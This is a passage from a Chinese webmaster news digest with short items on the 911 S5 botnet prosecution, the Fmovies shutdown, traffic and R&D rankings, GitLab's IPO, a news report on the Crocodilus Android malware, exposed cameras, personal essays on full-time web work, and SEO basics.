台是他从美国的几家在线服务提供商那里租用的。” “王云河使用这些专用服务器部署和管理应用程序,指挥和控制受感染的设备,运行其 911 S5 服务,并向付费客户提供访问与受感染设备相关的代理 IP 地址的权限。” 舍布鲁克大学的研究人员早在 2022 年 6 月透露,911 S5 团伙通过提供免费的 VPN 服务来引诱潜在的受害者安装代理恶意软件。 一个月后,该僵尸网络被关闭,起因是据称该团伙的关键组件在一次安全事件中遭破坏,但仅仅几个月后,它就以“CloudRouter”的名义死灰复燃了。司法部目前正在向域名注册商和注册机构发出查封令,以查封这个犯罪网络使用的以下域名。 王云河通过向网络犯罪分子出售代理 IP 地址的访问权获得了大约 9900 万美元(7.16 亿元人民币)的收入。犯罪分子利用受感染设备的互联网连接从事各种犯罪活动,包括网络攻击、炸弹威胁、剥削儿童、大规模欺诈、骚扰和违反出口规定。911 S5 客户还使用非法的住宅代理服务提交了成千上万份与《新冠病毒援助、救济和经济保障法案》(CARES)相关的欺诈性申请。他们还利用该服务提交了 56 万份欺诈性失业保险索赔和 47000 多份经济损失灾难贷款(EIDL)申请,导致金融机构、信用卡发卡机构和联邦贷款项目被盗数十亿美元。周二,美国财政部也制裁了王云河(管理员)、刘景平(该团伙的洗钱者)和郑燕妮(充当王云河的代理人),以及由王云河拥有或控制的三家实体(Spicy Code Company Limited、 Tulip Biz Pattaya Group Company Limited和Lily Suites Company Limited)。911 S5代理服务价格: 911用户的流量如何通过住宅IP地址路由传输图: 据 5 月 24 日公布的起诉书显示,王云河的众多资产和财产现在被没收,“包括一辆 2022 年法拉利 F8 Spider S-A、一辆宝马 i8、一辆宝马 X7 M50d 和一辆劳斯莱斯,十多个国内和国际银行账户,二十多个加密货币钱包,数块豪华手表,21 处住宅或投资房产(遍布泰国、新加坡、阿联酋、圣基茨和尼维斯以及美国)以及 20 个域名。”如果上述所有罪名成立,王云河将面临最高 65 年的监禁,罪名包括共谋实施计算机欺诈和重大计算机欺诈、共谋实施电信欺诈以及共谋洗钱。 #### 全球最大盗版网站Fmovies被关闭 站长被抓 近日,全球最大盗版网站Fmovies被关闭,其中两名与该运营有关的嫌疑人。 ACE联盟宣称关闭Fmovies这一全球最大的盗版流媒体网站负有部分责任。,ACE是由亚马逊、迪士尼和华纳兄弟等超过50家大型娱乐公司和制作工作室组成的联盟,旨在全球打击盗版,国内很多盗版网站早期也是受这个联盟的影响关闭。 目前国内大点的盗版网站几乎绝迹,即使有也不在国内运营了,可以说在打击盗版方面,国内取得非常大点的成果,而全球最大盗版网站Fmovies来自我们的邻居越南人创立运营,目前相关嫌疑人已在河内被警方抓获。 越南也跟国内早期一样,大家的盗版网站,而随着越南跟国际的接轨,目前越南正处于打击盗版的风口,由越南人创立的盗版网站,现在基本都相继关闭。 国内还有一些国人想着把服务器放国外,避免被抓,现在看来,国外也不安全了。 #### 全球最牛X的域名X.com或建社交平台 8月11日 消息:当地时间周二,马斯克透露称自己如果没有被迫完成440亿美元的推特收购,就将创办自己的社交平台,并暗示了一个域名“X.com”。如果此事成真,意味着Twitter将新增一个强有力的竞争对手。 据了解,X.com最初是马斯克在1999年与他人共同创立的一家在线银行,后来被合并成了PayPal,由eBay公司收购。2017年,马斯克从PayPal手中购买了域名“X.com”,并重新开通了该网站,目前只显示空白页面,多年来几无变化。 不过,马斯克可能还未决定是否建立自己的社交网络,因为他和推特的官司要到10月才开始。 如果 X.com 真的成为某种社交网络或推特的替代品,马斯克可能会专注于根除网站上的机器人,以及最大限度地减少审查。 #### 全球流量最大的网站排行榜:谷歌第一 百度第四 8月14日 消息:日前,Visualcapitalist网站发布了全球百大流量网站榜,据悉,想要挤进这份名单,网站单月访问量至少要达到3. 5 亿次。 从榜单来看,目前,最占优势的依然是搜索引擎网站。其中,前三名分别是美国的谷歌、Youtube和 Facebook。百度凭借在国内的流量优势,排名第四。维基百科、 Twitter、雅虎等均进入前十。 从上榜的 100 个网站中,我们发现,除了搜索引擎网站之外,流媒体视频和视频分享为全球互联网流量的另一大驱动力量,Netflix、Instagram等流量也是十分可观。 随着中国互联网行业的快速发展,中国企业在海外的影响力也逐渐增强。榜单显示,在上榜的 100 个网站中,有 15 家网站来自中国,数量仅次于美国。 #### 全球研发力2000强:华为第5、阿里21、腾讯61、百度81 欧盟委员会(EU)发布《2018年欧盟工业研发投资记分牌》(The 2018 EU Industrial R&D Investment Scoreboard),对全球46个国家和地区的2500家主要企业2017会计年度研发投入进行了调查。中国华为以113.34亿欧元的研发投入名列中国企业之首,在全球名列第五位。跻身百强榜的中国企业(含台湾地区)共有11家。 以下是根据2500家企业的大名单整理出研发投入最高的100家中国企业。 排名(全球)公司 行业 研发投入/研发占销售比率 5、华为(HUAWEI)科技、硬件和设备 113.34亿欧元/14.7% 51、阿里巴巴(ALIBABA GROUP HOLDING) 软件和计算机服务 29.14亿欧元/9.1% 59、鸿海精密(HON HAI PRECISION INDUSTRY)  电子和电气设备  22.85亿欧元/1.7% 台湾 60、台积电(TAIWAN SEMICONDUCTOR)  科技:硬件和设备 22.55亿欧元/8.3% 台湾 61、腾讯(TENCENT)   软件和计算机服务 22.35亿欧元/7.3% 76、中兴(ZTE)  科技:硬件和设备 17.98亿欧元/12.9% 81、百度(BAIDU)  软件和计算机服务 16.58亿欧元/15.3% 83、联发科(MEDIATEK)   科技:硬件和设备 15.97亿欧元/24.0% 台湾 86、中国建筑(CHINA STATE CONSTRUCTION ENGINEERING)   建设和材料  15.86亿欧元/1.2% 88、中国石油(PETROCHINA)   石油和天然气生产 15.78亿欧元/0.6% 99、中国铁路总公司(CHINA RAILWAY)  建设和材料 14.22亿欧元/1.6% 102、中国中车(CRRC CHINA)  工业工程 13.44亿欧元/5.1% 104、上汽集团(SAIC MOTOR)  汽车和零部件 & Parts 13.34亿欧元/1.3% 105、中国铁建(CHINA RAILWAY CONSTRUCTION)  建设和材料 13.31亿欧元/1.5% 126、中国交建(CHINA COMMUNICATIONS CONSTRUCTION)  建设和材料  11.05亿欧元/1.8% 128、美的集团(MIDEA GROUP)  家居产品和家建 10.88亿欧元/3.8% 130、携程(CTRIP.COM INTERNATIONAL) 旅行和休闲 10.58亿欧元/30.8% 143、联想集团(LENOVO)   科技:硬件和设备 9.73亿欧元/2.6% 144、中国电建(POWER CONSTRUCTION CORPORATION OF CHINA)  建设和材料  9.73亿欧元/ 2.9% 166、中国石化(CHINA PETROLEUM & CHEMICALS)  石油和天然气生产 8.23亿欧元/0.3% 182、比亚迪(BYD) 电子和电气设备 7.60亿欧元/5.8% 200、中冶(METALLURGICAL OF CHINA)  工业 6.83亿欧元/2.2% 219、招商银行(CHINA MERCHANTS BANK)  银行 6.07亿欧元/2.1% 222、TCL  电子和电气设备 6.04亿欧元/4.3% 224、上海建工(SHANGHAI CONSTRUCTION)  建设和材料 5.89亿欧元/3.3% 226、青岛海尔(QINGDAO HAIER)  家居用品和家建 5.88亿欧元/2.9% 235、网易(NETEASE)  软件和计算机服务 5.60亿欧元/8.1% 237、东风汽车(DONGFENG MOTOR)  汽车和零部件 5.47亿欧元/3.4% 251、宝钢(BAOSHAN IRON & STEEL)  工业:金属和采矿 5.06亿欧元/1.4% 268、台达电子(DELTA ELECTRONICS) 电子和电气设备 4.52亿欧元/7.2%  台湾 271、中国能建(CHINA ENERGY ENGINEERING) 建筑和材料 4.48亿欧元/1.5% 281、吉利汽车(GEELY AUTOMOBILE) 汽车和零部件 4.32亿欧元/3.6% 282、长城汽车(GREAT WALL MOTOR)  汽车和零部件 4.31亿欧元/3.5% 286、华硕(ASUSTEK COMPUTER)  科技:硬件和设备 4.17亿欧元/3.4% 台湾 290、长安汽车(CHONGOING CHANGAN)  汽车和零部件 4.14亿欧元/4.3% 303、中船重工(CHINA SHIPBUILDING) 工业工程 3.92亿欧元/8.1% 308、上海电气(SHANGHAI ELECTRIC) 工业工程 3.85亿欧元/3.8% 319、和硕(PEGATRON)  软件和计算机服务 3.73亿欧元/1.1% 台湾 325、群创光电(INNOLUX) 电子和电气设备 3.61亿欧元/3.9% 台湾 327、中芯国际(SEMICONDUCTOR MANUFACTURING)  科技:硬件和设备  3.56亿欧元/13.8% 336、联华电子(UNITED MICROELECTRONICS)  科技:硬件和设备 3.39亿欧元/8.1% 台湾 344、日月光(ADVANCED SEMICONDUCTOR ENGINEERING)  科技:硬件和设备 3.28亿欧元/4.0% 台湾 352、仁宝电脑(COMPAL ELECTRONICS) 电子和电气设备 3.22亿欧元/1.3% 台湾 353、纬创(WISTRON)  科技:硬件和设备 3.22亿欧元/1.4% 台湾 355、瑞昱半导体(REALTEK SEMICONDUCTOR)  科技:硬件和设备 3.20亿欧元/27.5% 台湾 359、京东方(BOE TECHNOLOGY GROUP) 电子和电气设备 3.18亿欧元/2.7% 374、福田汽车(BEIQI FOTON MOTOR) 工业工程 3.02亿欧元/4.9% 407、友达光电(AU OPTRONICS) 电子和电气设备 2.75亿欧元/2.9% 台湾 410、烽火科技(FIBERHOME TELEKOMMUNICATIONS TECHNOLOGIES) 固话电信 2.74亿欧元/10.3% 415、广达电脑(QUANTA COMPUTER)  科技:硬件和设备 2.70亿欧元/0.9% 台湾 423、宏达电子(HTC)  科技:硬件和设备 2.65亿欧元/15.2% 台湾 429、江铃汽车(JIANGLING MOTORS) 汽车和零部件 2.60亿欧元/6.8% 430、河钢(HESTEEL) 工业:金属和采矿 2.60亿欧元/1.9% 442、江淮汽车(ANHUI JIANGHUAI AUTOMOBILE) 汽车和零部件 2.53 亿欧元/4.3% 444、均胜电子(NINGBO JOYSON ELECTRONIC) 汽车和零部件 2.52亿欧元/7.5% 456、三一重工(SANY HEAVY INDUSTRY) 工业工程 2.44亿欧元/5.1% 457、太钢不锈(SHANXI TAIGANG STAINLESS STEEL) 工业:金属和采矿 2.44亿欧元/2.8% 464、乐视网(LESHI INTERNET INFORMATION & TECHNOLOGY CORPORATION) 软件和计算机服务 2.38亿欧元/26.6% 465、中航科工(AVICHINA INDUSTRY & TECHNOLOGY) 工业运输 2.38亿欧元/5.7% 475、中国化学(CHINA NATIONAL CHEMICAL ENGINEERING) 建设和材料  2.31亿欧元/3.1% 478、特变电工(TEBIAN ELECTRIC APPARATUS STOCK) 电子和电气设备 2.31亿欧元/4.9% 482、大华(ZHEJIANG DAHUA TECHNOLOGY) 休闲用品 2.29亿欧元/9.8% 484、创科集团(TECHTRONIC INDUSTRIES) 电子和电气设备 2.27亿欧元/4.5% 488、欧菲科技(O FILM TECH) 电子和电气设备 2.25亿欧元/5.2% 494、新浪(SINA)  科技:硬件和设备 2.23亿欧元/16.9% 496、中海油(CNOOC) 石油和天然气生产 2.23亿欧元/0.9% 497、百济神州(BEIGENE) 制药和生物技术 2.22亿欧元/111.8% 501、中国葛洲坝(CHINA GEZHOUBA) 建设和材料 2.21亿欧元/1.6% 525、艾派克微电子(APEX TECHNOLOGY) 科技:硬件和设备 2.10亿欧元/8.0% 535、中国生物制药(SINO BIOPHARMACEUTICAL) 制药和生物技术 2.06亿欧元/10.9% 537、国电南瑞(NARI TECHNOLOGY DEVELOPMENT LIMITED) 软件和计算机服务  2.06亿欧元/6.7% 539、广州汽车(GUANGZHOU AUTOMOBILE) 中国 汽车和零部件 2.05亿欧元/2.2% 545、蓝思科技(LENS TECHNOLOGY)  家庭用品和家建 2.02亿欧元/6.8% 553、立讯精密(LUXSHARE PRECISION INDUSTRY)  电子和电气设备 1.98亿欧元/7.0% 563、瑞声科技(AAC TECHNOLOGIES HOLDINGS) 电子和电气设备 1.92亿欧元/7.1% 573、华邦电子(WINBOND ELECTRONICS)  科技:硬件和设备 1.88亿欧元/14.1% 台湾 577、创维数字(SKYWORTH DIGITAL) 电子和电气设备 1.87亿欧元/3.8% 583、宇通客车(ZHENGZHOU YUTONG BUS)汽车和零部件 1.86亿欧元/4.7% 585、金山软件(KINGSOFT) 软件和计算机服务 1.85亿欧元/16.6% 597、宝成国际(POU CHEN) 个人产品 1.80亿欧元/2.3% 台湾 600、光宝科技(LITE-ON TECHNOLOGY)  科技:硬件和设备 1.79亿欧元/3.0% 台湾 607、裕元工业(YUE YUEN INDUSTRIAL) 个人用品 1.75亿欧元/2.3% 612、58同城(58.COM) 软件和计算机服务 1.75亿欧元/13.5% 614、清华同方(TSINGHUA TONGFANG)  科技:硬件和设备 1.74亿欧元/5.3% 616、完美世界(PERFECT WORLD) 软件和计算机服务 1.73亿欧元/35.2% 617、隧道股份(SHANGHAI TUNNEL ENGINEERING) 建设和材料 1.73亿欧元/4.3% 632、联咏科技(NOVATEK MICROELECTRONICS) 电子和电气设备 1.62亿欧元/12.3% 台湾 638、潍柴集团(WEICHAI POWER) 汽车和零部件 1.60亿欧元/0.8% 645、万华化学(WANHUA CHEMICAL GROUP) 化学 1.57亿欧元/2.3% 673、东方电气(DONGFANG ELECTRIC) 工业工程 1.50亿欧元/3.9% 680、鸿腾精密(FIT HON TENG)  电子和电气设备 1.49亿欧元/5.3% 691、科大讯飞(IFLYTEK) 软件和计算机服务 1.46亿欧元/21.2% 692、冠捷科技(TPV TECHNOLOGY)  HENGTONG OPTIC ELECTRIC 1.46亿欧元/1.8% 707、正新橡胶(CHENG SHIN RUBBER INDUSTRY)  汽车和零部件 1.42亿欧元/4.5% 台湾 717、中国电信(CHINA TELECOM ) 科技:硬件和设备 1.39亿欧元/0.3% 722、舜宇光学科技(SUNNY OPTICAL TECHNOLOGY) 电子和电气设备 1.37亿欧元/4.8% 729、四川长虹(SICHUAN CHANGHONG ELECTRIC) 电子和电气设备 1.36亿欧元/1.4% 735、亨通光电(HENGTONG OPTIC ELECTRIC) 科技:硬件和设备 1.34亿欧元/4.1% 740、英业达(INVENTEC)科技:硬件和设备 1.33亿欧元/1.0% 台湾 744、臻鼎科技控股(ZHEN DING TECHNOLOGY HOLDING) 电子和电气设备 1.32亿欧元/4.3% 台湾 #### 全球第二大开源代码托管平台GitLab上市 10月15日 消息:北美时间10月14日,全球第二大开源代码托管平台 GitLab (股票代码 GTLB)正式登陆纳斯达克股票交易所,发行价为77美元,发行1040万股,募资总额8亿美元。 数据显示,GitLab 在上市当天的开盘价为94.25美元,较发行价上涨22.4%;收盘价为103.89美元,较发行价上涨34.92%;以收盘价计算,GitLab 市值148.58亿美元。 据悉,GitLab创建于2011年,自成立以来,GitLab在源代码存储库市场不断的追赶 着GitHub。2018年,微软以75亿美元收购了 GitHub,这也让GitHub进入了“野蛮生长”时期。 早在2020年11月18日,GitLab 就进行了首次公开招股,但受新冠疫情的影响,GitLab 取消了上市计划。2021年,9月17日, GitLab 向美国证券交易所提交招股书,计划在纳斯达克上市。 数据显示,GitLab 平台大约有3000万的注册用户。截至2021年7月31日,开源社区的贡献者达到了2600位。 另外,根据此前披露的招股书,2020-2021财年,使用GitLab付费版本、并为GitLab贡献每年10万美元以上收入的大客户分别有173家和283家。而现在,这一数据增长到了383家。 国内开源社区何时有这种规模呢? #### 全球约 42% 的网站流量来自爬虫机器人 根据 Akamai Technologies 最新的报告,机器人占据了整体网站流量的42%,其中65% 的机器人属于恶意类型。 报告指出,随着对盗取网站数据的需求增加,电子商务行业受到了高风险机器人流量的严重影响。尽管一些机器人对业务有利,但网页抓取机器人被用于竞争情报和间谍活动,库存囤积,冒名网站创建等恶意行为,这对企业的利润和客户体验产生了负面影响。 报告还发现,企业面临着来自恶意或有益目的的抓取所带来的技术影响,如网站性能下降、网站指标污染、来自钓鱼网站的凭证受损攻击、计算成本增加等。 报告还提供了对抗网页抓取机器人的缓解策略,并展示了一个案例研究,说明一旦建立对抗这些机器人的防御措施,网站运行得更快、更有效。 主机吧之前的网站就是一堆的爬虫机器人,时不时就来一下,导致服务器CPU经常飙升100%,为此还利用百度云防护进行了恶意搜索拦截,现在服务器清净很多,也快很多。 #### 全球自动驾驶专利排行榜:百度第一,华为第六 11月7日 消息:近日,中国知识产权杂志网站公布了全球自动驾驶领域发明专利企业排名。 榜单显示,其中,百度公司以3477件的申请量居榜首,丰田3392件、博世2552件、本田2466件、现代2024件分列2-5位。 对此,百度官方表示,根据相关统计,全球约有43%的自动驾驶发明专利来自中国,大幅领先美国25%、韩国9%、德国9%、日本8%等发达国家;与此同时,中国也成为全球最大的自动驾驶专利布局目标市场,全球共有58%的自动驾驶专利在中国布局。 据了解,截至目前,百度自动驾驶测试总里程超过3600万公里。已在北京、重庆、武汉、长沙、阳泉等城市开展自动驾驶商业化出行服务,总订单量超过100万单,其中重庆、武汉已实现车内无安全员的自动驾驶商业化出行服务。 #### 全球警报:安卓恶意软件“Crocodilus”升级,伪造本地联系人实施精准诈骗 【6月4日综合报道】 据科技媒体Bleepingcomputer于6月3日披露,一款名为Crocodilus的安卓恶意软件正在全球范围内加速传播,其最新变种具备一项极具欺骗性的新功能:在受害者设备上创建伪造的本地联系人,显著提升诈骗电话的得手率。 网络安全研究机构Threat Fabric(荷兰)在其最新研究报告中指出,Crocodilus最早于2025年3月现身,初期活动范围主要局限于土耳其,功能相对基础,以窃取用户数据和实施远程控制为主。该恶意软件曾利用伪造的错误弹窗进行社交工程攻击,诱骗用户紧急“备份”加密货币钱包密钥,否则将面临“资产损失”。 然而,Threat Fabric的最新监测数据显示,Crocodilus的攻击范围已急剧扩大至全球多个国家和地区。受害者分布热力图清晰显示,其影响范围已横跨欧亚非大陆及美洲部分区域。 技术能力显著增强,规避检测手段升级 报告强调,新版本的Crocodilus在技术上进行了重大升级,以增强其隐蔽性和对抗分析的能力: 加载器(Dropper) 采用了复杂的代码打包技术。 核心恶意载荷(Payload) 增加了额外的XOR加密层。 广泛运用代码混淆和纠缠技术,极大增加了安全研究人员进行逆向分析的难度。 恶意软件现在能够在受感染设备上本地解析窃取的数据(如登录凭证、金融信息等),进行初步筛选后再传输给攻击者,此举提高了所窃数据的质量和利用价值。 核心威胁:伪造本地联系人,冒充可信来源 最值得警惕的新增功能是Crocodilus能够根据攻击者发出的特定指令(例如命令代码 TRU9MMRHBCRO),直接在受害者的安卓设备通讯录中创建伪造的联系人条目。 此功能的危害性在于:当攻击者拨打受害者电话时,受害者手机屏幕上显示的将是伪造联系人的名称(例如预设为“银行客服”、“某亲友”),而非真实的陌生号码。这极大地增强了来电的欺骗性,使受害者更容易误认为是来自可信机构或熟人的联系,从而落入诈骗陷阱(如转账汇款、透露敏感信息)。 技术细节与隐蔽性:研究人员确认,该功能通过滥用安卓系统的ContentProvider API实现。值得注意的是,这些伪造的联系人仅存储在设备本地,不会同步至用户的Google账户。这意味着: 用户在网页版或其他设备上查看Google通讯录时无法发现异常。 恶意软件卸载或设备重置后,伪造联系人会自动消失。 该设计极大提升了操作的隐蔽性,普通用户难以察觉。 安全建议与风险提示 Threat Fabric研究人员向全球安卓用户发出强烈警告,并建议采取以下防护措施: 严格管控应用来源:仅从官方应用商店(Google Play Store)或绝对可信赖的渠道下载安装应用。警惕来源不明的APK安装包。 审慎授权应用权限:安装应用时,仔细审查其申请的权限。对索要通讯录、短信等高敏感权限的非必要应用(如工具类软件)保持高度警惕,必要时拒绝授权。 及时更新操作系统:确保安卓设备及时安装最新的安全补丁,修复已知漏洞。 部署可靠安全软件:安装并定期更新信誉良好的移动安全防护应用。 保持警惕,多方验证:即使来电显示为“认识”的联系人名称,若涉及金钱交易、账户操作或敏感信息索取,务必通过其他独立、可靠的渠道(如官方客服热线、线下见面)进行二次确认。诈骗分子可能正在利用伪造联系人信息实施精准诈骗。 目前,安全社区正在持续监控Crocodilus的传播态势和技术演变。该恶意软件的全球扩散及其伪造联系人的新特性,标志着移动威胁在社交工程层面达到了新的复杂程度,用户需提高防范意识。 #### 全球超级计算机 500 强:美国超越中国重回世界第一快 11 月 15 日消息:日前新一期全球超级计算机 500 强榜单在美国达拉斯发布。与半年前的榜单相比,全球格局变化不大,美国在最快超算上领跑,中国在数量上继续增长,而且能效也有所提升。 始于 1993 年的全球超算 500 强榜单由国际组织「TOP 500」编制,每半年发布一期,是给全球已安装的超级计算机排座次的知名榜单。 经过半年一度的评估,衡量超级计算机的计算速度,美国制造的 IBM 机器「Summit」击败了两名中国竞争对手,成为世界上速度最快的同类产品。目前在排名前十的机器中,有五台在美国。 #### 全球超过 4 万台监控摄像头未进行任何加密,黑客可随意访问 6 月 14 日消息,安全公司 Bitsight 披露报告,透露该公司扫描了互联网上基于 HTTP 和 RTSP 协议的摄像头,发现全球有超过 4 万台监控摄像头直接暴露在互联网中,可以被任何人“公开访问”,而设备拥有者往往对此“毫不知情”,相应监控摄像头覆盖家用安防场景、婴儿护理场所、办公室监控系统,甚至还有医院与工厂内部的监控。 Bitsight 旗下 TRACE 实验室的首席安全研究员 João Cruz 指出,这些监控摄像头事实上并没有进行任何加密,几乎只需要默认账号密码及有效的 IP 地址即可访问,目前在地下论坛已有大量黑客设法搜集这些摄像头 IP 信息,并将其打包用于出售,其中涉及民众家宅、办公室白板内容、数据中心等敏感场景。 就国家地区分布来看,美国以约 14000 台暴露设备居首,其次是日本、奥地利、捷克和韩国,这些监控摄像头被公开暴露的原因源于“基础设置失误”,例如使用默认账号密码、开放网络访问权限等,使设备极易被黑客入侵。 Bitsight 呼吁,设备厂商需要提升产品的安全设计,但用户自身也要承担起责任,用户务必定期检查远程访问设置、修改默认密码、及时更新固件,同时加强防火墙设置,以确保内部监控系统不被外泄。 #### 全职站长的家里蹲生活体验 今年年初上班第一天正式离职的,然后全职做网站;到现在已经三个月了,分享一些体验吧!希望对那些想全职做站长的朋友们一些参考。 为什么离职,全职做站:明说主要原因是副业收入超过了上班收入;但真正辞职原因是是上班时间没办法兼顾副业,其实我之前工作很清闲,但一些事不太方便上班搞副业,所以只能鱼和草鱼中选一个,想自由一下。 全职做网站容易发际线变高: 副业之所以叫副业,是有道理的,因为做副业收入一般不稳定。举个例子:如果3月份收入很多,4月份收入只有3月的一半就容易焦虑(有收入也一样会焦虑,焦虑方向,焦虑未来和明天)甚至会怀疑自己,容易多想  失眠,幻得幻失感觉,这种焦虑是一种状态,特别特别难受!可能是没有了稳定的工作那份安心(也许是之前上班上魔怔了),前两个月特别严重,适应后就好了。 全职做网站社保问题: 我自己注册的有公司,但我挂靠在朋友的公司那里社保,可以省事和省钱。如果要做全职做网站(好听点:灵活就业),那最好是将社保交到亲人朋友开的公司里,如果亲人朋友都人打工的没有公司,那就只能自己注册个公司自己交了。 很难做个时间管理大师: 开始不上班每天睡到中午12点起,当时天气太冷不想起床,但一墨迹懒了连饭都不想做,点个外卖吃了午饭就下午两三点了,等进入状态就已经到人家下班时间了,开始时是很难自律的。 自由职业和社会脱轨: 全职做网站后才一个月,上海就封到现在,本来每天在家蹲着,现在每天基本0社交,有了时间却没了聚会社交。时间不规律;睡到自然醒,胡子拉碴  鸡窝头!  形象简直就是一团遭,容易变懒。 我认为上班时间搞副业是最优选择: 如果工作不会影响你搞副业,就算副业收入超过主业,我的建议也是不要丢了工作;因为工作才是生活基石,副业是上层建筑;拿两份钱更香。也不会和社会脱节,生活时间变化,个人心情都会有变化的。如果工作太忙影响了上班时间搞副业,那就换个闲职全天摸鱼那种,拿工资搞站是最好的方法,那怕工资少点。创业开公司搞团队的直接无视 要不要找个闲职搞副业吗? 我是不会了(除非开始吃土了),已经过了那种焦虑期了,开始习惯了自由的生活时间,不想再回去早九晚五按部就班。但如果我当时辞职后重新选择,我会选择找个闲职兼顾做副业。 全职建站有哪些正面的吗: 都说的是一些副面的,正面也是相对的。自由是真TM爽啊,想起床就起床,想睡就睡。然后就是规划更强烈,今天做什么,明天做什么写得明明白白(工作时也写,但就是拖效率);处理事务效率更高更快,有问题和事情计划就去做,不会拖拉。群里吹水时间变少,逛4414变少了。 最后!你是做什么网站赚钱的? 网站赚个锤子钱,网站只是一个皮  一张名片,就像介绍我是做什么工作的,一个身份。实际是玩小行业圈子的,靠的是在行业几年的人脉资源,认识行业中的一些老板 为品牌企业做些服务赚点茶水费,算个自由的打工人。 原文作者:李半仙 #### 全职自媒体工作3年,我总结了这4点经验 来源:蒋昊说经济 3年前,我决定放下身边一切工作,全身心投入自媒体,那一年,我把自己关在小房间里,除了吃饭、睡觉,就是写作! 这一年,我开始接触到今日头条这个平台,也是因为今日头条,让我找到了写作的乐趣和自由! 乐趣在于每天写的文章,都有几千阅读量,甚至几万、几十万的阅读量,这时候,会有很多读者给我评论,有赞扬的,也有“抬杠”的,真的很开心,因为我从一个小小的个体,慢慢找到了许多志同道合的朋友。 自由在于每天不用像身边的朋友一样,朝九晚五,因为,做自媒体,只需要一台电脑,你就仿佛拥有了全世界。 写作累了,就休息,休息好了,就工作,经常性在家里准备了一箱泡面, 一吃就是三天三夜,吃腻了,吃到想吐了,晚上再约几个朋友,一起下馆子,交谈甚欢。 记得刚开始全职自媒体,最大的的问题,就是不赚钱,每篇文章收益只有几块钱,一篇爆款文章, 收益也只有100多元,这样,一个月下来,收入只有1000多元,在深圳这样的一线城市, 1000元连交房租都不够。 但是,作者没啥本事,就是能坚持,能吃苦,就这样啃着馒头,吃着泡面,撑了两年。 2018年,今日头条推出了悟空问答,作者就是抓住了这次机会,让自己的收入开始翻了好几倍。 在坚持了一年的悟空问答之后,接下来,作者在今日头条开通了付费专栏。专栏开通的第一个月,作者的月收入又上了一个新台阶: 之后,做的两个专栏销售额都突破了50万: 直到2019年7月份,作者的自媒体单日最高销售额,达到了3.7万,收入也突破了2万: 除此之外,作者的头条圈子也运营起来了,累计销售额也达到了7万: 接下来,作者将给大家分享, 在今日头条写作3年的4大经验: 经验1:定位很关键 其实,每个领域,变现方式有所不同,作者做财经领域,其实是一个用户付费意愿比较高的领域,但是像娱乐、手工、历史、文化类,付费意愿度就没有商业财经高。 付费内容,定位的关键在于:你的内容能够让用户读完,直接产生收益,简单来说,就是教粉丝怎么赚钱, 这种内容的付费价值就很大! 就好比作者的这篇付费文章,一共有566万的阅读量,超过3247人付费订阅了: 经验2:了解平台的规则 每个平台其实对内容的调性、推送规则都是不一样的,你的文章可能在微信没有火,但是分发到头条上很可能火了,这是因为头条是推荐机制,而微信属于转发机制。 一个是流量去中心化,一个是流量中心化,不同的平台,要采取不同的运营方法: 以公众号为例,作者偶尔也会写出一些爆款文章,阅读量高达上百万,写作的逻辑是,我的文章,一定要抓住大家的痛点,引起读者的共鸣,这样才会有转发,只要超过1000人转发了我的文章,我的文章阅读量大概率会超过10万+,如果要写出100万+的爆文,那就需要至少1万人转发。 但是在今日头条,作者写爆款文章会更加简单,因为我对今日头条的平台运营经验会更加丰富。 经验3:标题非常重要 比方说,作者有篇文章标题《中国最有钱的四大家族,王健林、马云都挤不上榜,李嘉诚只能排第二,第一名你想不到》 其实一个好标题,是有规律的,作者把规律总结为一个公式:三段式+层层递进+最后反转标题为何会吸引人,首先要采取三段式,因为三段式的标题,信息量更充分,让读者知道,你想要写什么内容,同时,也要有所保留,设下悬疑,所以,最后一段标题,要有反转: 大家看这个标题:《北京最牛房东:一天收租超1900万,地皮价值2000亿,然而却不是中国人》,这个标题就满足了三个爆款条件,第一,抓眼球,第一句话就很吸引人,北京最牛房东,第二,层层递进,后面用数字告诉大家,一天收租赚1900万,最后一段来个反转,告诉大家,这个最牛房东,原来不是中国人,彻底激发了大家的点击欲望, 所以,这篇文章,最终有103万的阅读量。 经验4:写作逻辑清晰 简单来说就是你写文章,要有用户思维,其实不是你想写什么,就去写什么,而是你要思维,读者需要什么,你再去写什么。 那么如何站在读者的角度来创作内容呢?作者给大家拆解成以下步骤: 第一、从表达逻辑到倾听逻辑 表达和表演一样,都是人的天性,同时表达是你与这个世界沟通的重要手段,是建立自己存在感的总要手段,比如你发一条朋友圈,你会思考,这条朋友圈希望哪些人看到,希望哪些人点赞。所以,你要写好文章,首先要学会倾听,倾听他人的需求。 第二、从得到逻辑到给予逻辑 作者在写文章的时候,第一个问题,就要思考,读者凭什么要读我的文章, 我的文章能给大家带来什么?想清楚这个问题再下笔。 只有当你逻辑清晰的时候,写作的思路才会清晰,文章才有传播的价值!   #### 全靠同行衬托,CNZZ统计宣布收费后51啦统计流量翻倍 上周有聊过,友盟+(CNZZ)宣布将停止免费用户使用了!导致有统计需求的用户出走。 这不直接受益的同行,就是51啦统计了,目前51啦还是免费的,只是对大型网站需要收费,不过基本可以满足绝大数站长了。 面对着突如其来的流量,51啦也在些顶不住哈,数据都开始延迟了,据官方说单日接入站点数比平时多了5倍,流量更是亿级的,可见站长群体还是非常大的哈,友盟这波赶用户的行为不知道会不会后悔。 #### 全面了解谷歌搜索引擎的搜索结果页 搜索引擎结果页(SERP)是谷歌和其他搜索引擎根据用户的搜索查询显示的页面,它们由自然搜索结果以及付费搜索这两种结果组成。那么SERP是如何帮助网站建设者提升用户访问量呢,我们通过几个步骤让大家直观了解它的具体运作。 man hands forming a cup and the word SEO, search engine optimization, written in red 为什么SERP对SEO很重要? 大多数人在SERP的只会在第一页的搜索页面上点击,很少会访问第二页。 (从第2页之后访问量大幅下降) 这就是每个网站运营方都想在搜索引擎第一页上获得排名的原因,如果你的网站排到了第二页或者更后面,被点击的可能性十分微小。但是出于某些原因,在首页上排名并不总是等于大量的访问。 1、大多数用户点击的都是排名前几个位置的文章 (排名前3的文章收获了75.1%点击) 2、付费内容也会占据比较好的位置,使得SERP的自然排名下降 例如,搜索“在线购买眼镜”的自然搜索结果上方显示了四个付费广告,据统计显示,这一搜索词展示的页面大约39%为属于付费结果。 3、搜索引擎有时会用SERP功能来回答搜索查询 如“谷歌上搜索最多的内容”,会直接显示出对应的结果,用户无需再点击其他页面。 如何获得SERP? 每个查询的SERP可能看起来都不同,但是他们全部由相同的三个主要模块组成: 1、付费广告 2、自动搜索结果 3、SERP功能 下面,我们将详细介绍这三个主要模块功能,并说明如何显示这些内容。 1、付费广告 